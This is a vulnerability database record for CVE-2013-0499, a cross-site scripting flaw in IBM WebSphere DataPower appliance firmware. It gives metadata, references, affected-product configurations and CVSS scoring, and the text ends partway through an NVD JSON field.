CVE-2013-0499 (GCVE-0-2013-0499)

Vulnerability from cvelistv5 – Published: 2013-05-28 16:00 – Updated: 2024-08-06 14:25

Summary

Severity ?

No CVSS data available.

CWE

Assigner

ibm

References

URL

Tags

	https://www.sec-consult.com/fxdata/seccons/prod/t…	x_refsource_MISC
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
	http://seclists.org/bugtraq/2013/May/83	mailing-listx_refsource_BUGTRAQ
	http://www-01.ibm.com/support/docview.wss?uid=swg…	x_refsource_CONFIRM

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T14:25:10.355Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
          },
          {
            "name": "was-datapower-echo-xss(82221)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
          },
          {
            "name": "20130523 SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://seclists.org/bugtraq/2013/May/83"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-05-17T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "shortName": "ibm"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
        },
        {
          "name": "was-datapower-echo-xss(82221)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
        },
        {
          "name": "20130523 SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://seclists.org/bugtraq/2013/May/83"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2013-0499",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt",
              "refsource": "MISC",
              "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
            },
            {
              "name": "was-datapower-echo-xss(82221)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
            },
            {
              "name": "20130523 SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services",
              "refsource": "BUGTRAQ",
              "url": "http://seclists.org/bugtraq/2013/May/83"
            },
            {
              "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717",
              "refsource": "CONFIRM",
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
    "assignerShortName": "ibm",
    "cveId": "CVE-2013-0499",
    "datePublished": "2013-05-28T16:00:00",
    "dateReserved": "2012-12-16T00:00:00",
    "dateUpdated": "2024-08-06T14:25:10.355Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"52EF1C54-93CD-4B24-B553-0959A3816849\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"91AC9EFB-90F4-4608-9C36-CDE03234CE34\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"AE42F365-E83B-4DA8-B84A-E81F77CC63B6\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D25888C5-0200-4124-AE4F-D1989B9D0943\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"AB499F52-5A18-40F9-A63A-A7C0E2A79D2D\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"50016031-DAFB-420A-BC46-66C8D89681F4\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"C8DC137A-40F9-4E81-AE46-D1A512533FD1\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5E83E70F-AB49-43F7-A873-A1C6B5429E1A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"68324EA4-89EA-4752-B39D-DA13B7FC39A8\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"85315EC4-FCAF-44CC-8BF9-C85CAD3637BA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"EF697743-6F1C-4C98-9EA2-E1EE1E7963CB\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"0434DBE4-7EE5-4A9D-AB44-02DC114BBD55\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"6BEC2F83-9C7F-44D9-A75B-BC5CDBCD61D5\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2C1AE21E-2D17-44F9-A116-4A162DEA8F60\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"11817A12-ED84-4EF4-97CF-F8EB95F7196A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F0B9D60E-8218-4A58-9DD3-CF4D8AEF7914\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F7D77730-2F0E-4046-942F-ACDCF4C16439\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"7C6AC122-7C0B-42B3-B9FB-1E1F4E3C31FF\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F9EBDAA7-4D20-4328-A4D7-19C5493A9EDB\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5586C7C0-315B-4F3E-921B-30260A5A6238\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5ED9C5A0-274C-4CAF-84E2-3A59B48C890C\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"126DDB17-7D0A-426C-9CC2-EFED785E8CDC\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"ED6E2091-AEC2-43FD-A5D3-B6F805C95CD7\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F8E7E192-0494-498C-BF20-7C2AF3102D0B\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2346457F-39BA-407E-8451-D44FB947757E\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"A592E7D9-B5B8-45DD-AAF0-E380F7511AA4\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"A570957F-5B26-46FD-B51B-E90C96EB4168\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"04EFE5AD-4652-4254-8AE9-D06F3453A808\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"AD176549-564F-49E8-9FDA-F4C263E5817F\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"137D5F48-9118-4C2D-941A-8AEB48567443\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"AB95DC9D-D74B-45E1-AFB0-80F7A1F46FA9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"0833251B-E8A5-4E4A-B7CC-700E205509FE\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"DD789CDF-5F99-4FD3-ADE2-36297310EADA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"CF02EAA9-1CDA-4C8C-AF34-E133AA3497D5\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2E6B0888-C558-48EF-9C1B-4E169ECC70AD\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2EBB66F8-B497-404C-813A-A40E853054D6\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"357A5629-DF00-483B-BD8F-CCD05CF8CFA8\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"122283E7-E514-4ED7-9529-A75CF236855B\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"716DBA1D-16EE-4E87-BA6B-A444981392BB\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"513606F6-9E5C-45E9-86AE-332F1EDC06D3\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"390A7634-FDD9-4FB9-8641-31AB41168E85\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5257F9FA-F807-4D15-BF7C-8A9531619A50\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad de tipo cross-site scripting (XSS) en la funcionalidad echo en dispositivos SOA WebSphere DataPower de IBM con la versi\\u00f3n de firmware 3.8.2, 4.0, 4.0.1, 4.0.2 y 5.0.0, permite a los atacantes remotos inyectar script web o HTML arbitrarios por medio de un mensaje SOAP, como es demostrado por los servicios Firewall XML, Multi Protocol Gateway (MPGW), Proxy de servicio web y Token web.\"}]",
      "id": "CVE-2013-0499",
      "lastModified": "2024-11-21T01:47:41.277",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:N/C:N/I:P/A:N\", \"baseScore\": 4.3, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"NONE\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.6, \"impactScore\": 2.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": true}]}",
      "published": "2013-05-28T16:55:01.133",
      "references": "[{\"url\": \"http://seclists.org/bugtraq/2013/May/83\", \"source\": \"psirt@us.ibm.com\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www-01.ibm.com/support/docview.wss?uid=swg21637717\", \"source\": \"psirt@us.ibm.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/82221\", \"source\": \"psirt@us.ibm.com\"}, {\"url\": \"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt\", \"source\": \"psirt@us.ibm.com\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://seclists.org/bugtraq/2013/May/83\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www-01.ibm.com/support/docview.wss?uid=swg21637717\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/82221\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}]",
      "sourceIdentifier": "psirt@us.ibm.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2013-0499\",\"sourceIdentifier\":\"psirt@us.ibm.com\",\"published\":\"2013-05-28T16:55:01.133\",\"lastModified\":\"2025-04-11T00:51:21.963\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de tipo cross-site scripting (XSS) en la funcionalidad echo en dispositivos SOA WebSphere DataPower de IBM con la versi\u00f3n de firmware 3.8.2, 4.0, 4.0.1, 4.0.2 y 5.0.0, permite a los atacantes remotos inyectar script web o HTML arbitrarios por medio de un mensaje SOAP, como es demostrado por los servicios Firewall XML, Multi Protocol Gateway (MPGW), Proxy de servicio web y Token web.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"52EF1C54-93CD-4B24-B553-0959A3816849\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"91AC9EFB-90F4-4608-9C36-CDE03234CE34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AE42F365-E83B-4DA8-B84A-E81F77CC63B6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D25888C5-0200-4124-AE4F-D1989B9D0943\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AB499F52-5A18-40F9-A63A-A7C0E2A79D2D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"50016031-DAFB-420A-BC46-66C8D89681F4\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C8DC137A-40F9-4E81-AE46-D1A512533FD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5E83E70F-AB49-43F7-A873-A1C6B5429E1A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68324EA4-89EA-4752-B39D-DA13B7FC39A8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"85315EC4-FCAF-44CC-8BF9-C85CAD3637BA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF697743-6F1C-4C98-9EA2-E1EE1E7963CB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0434DBE4-7EE5-4A9D-AB44-02DC114BBD55\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6BEC2F83-9C7F-44D9-A75B-BC5CDBCD61D5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2C1AE21E-2D17-44F9-A116-4A162DEA8F60\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"11817A12-ED84-4EF4-97CF-F8EB95F7196A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F0B9D60E-8218-4A58-9DD3-CF4D8AEF7914\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7D77730-2F0E-4046-942F-ACDCF4C16439\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7C6AC122-7C0B-42B3-B9FB-1E1F4E3C31FF\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9EBDAA7-4D20-4328-A4D7-19C5493A9EDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5586C7C0-315B-4F3E-921B-30260A5A6238\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5ED9C5A0-274C-4CAF-84E2-3A59B48C890C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"126DDB17-7D0A-426C-9CC2-EFED785E8CDC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ED6E2091-AEC2-43FD-A5D3-B6F805C95CD7\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F8E7E192-0494-498C-BF20-7C2AF3102D0B\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2346457F-39BA-407E-8451-D44FB947757E\"},